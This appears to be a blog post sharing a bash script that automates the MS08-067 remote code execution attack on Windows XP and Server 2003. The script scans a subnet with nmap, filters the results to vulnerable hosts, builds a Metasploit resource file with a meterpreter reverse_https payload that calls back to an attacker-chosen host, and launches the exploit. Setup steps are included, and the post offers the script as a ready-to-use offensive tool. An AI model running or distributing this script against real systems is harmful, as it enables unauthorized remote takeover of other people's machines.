ms08-067 Remote Code Execution Automation

Microsoft Security Bulletin on the vulnerability.

Script for automation of discovery and exploitation of Windows XP ms08-067 remote code execution vulnerability.

Setup
chmod +x ms08-67auto.sh
./ms08-67auto.sh

What It Does
Enter an ip and a subnet for nmap to scan
nmap scans the OS’s and ports 139 and 445
grep filters results to only Windows XP or Server 2003
Prints results and confirm you want to attack
Gathers RHOST RPORT LHOST and LPORT values for a metasploit rc file
Opens created rc file in metasploit
Run exploit -j to begin

#!/bin/bash
read -p $’\e[1;32mEnter the ip and subnet ex. 10.0.0.0/24:\e[0m ‘ ipsubnet
echo -e “\e[1;31mScanning for ports 445 and 139\e[m”
scan=$(sudo nmap $ipsubnet -O -p 445,139)
ports=$(echo “$scan” | grep -E -B 3 -A 7 ‘445/tcp open|139/tcp open’ | grep -E -B 8 ‘Microsoft Windows XP|Microsoft Windows Server 2003’)
echo “$ports”
#echo $scan
read -p ‘Is there a target to attack? Press y:’ attack
if [ “$attack” = “y” ]; then
read -p $’\e[1;31mTarget IP address:\e[m’ rhost
read -p $’\e[1;31mWhich port is the service running on?:\e[m’ rport
read -p $’\e[1;31mWhich ip would you like to connect back too?:\e[m’ lhost
read -p $’\e[1;31mWhich port would you like to connect back on?:\e[m’ lport
sudo service postgresql start
echo -e “use exploit/windows/smb/ms08_067_netapi\nset RHOST $rhost\nset RPORT $rport\nset PAYLOAD windows/meterpreter/reverse_https\nset LHOST $lhost\nset LPORT $lport\nset ExitOnSession false” > windowsxp.rc
msfconsole -q -r windowsxp.rc

else
exit
fi
# 445 and 139

https://github.com/n00shE/ms08-067automation

Posted in Computers and OSs, Networks, Security.

Leave a Reply

Your email address will not be published. Required fields are marked *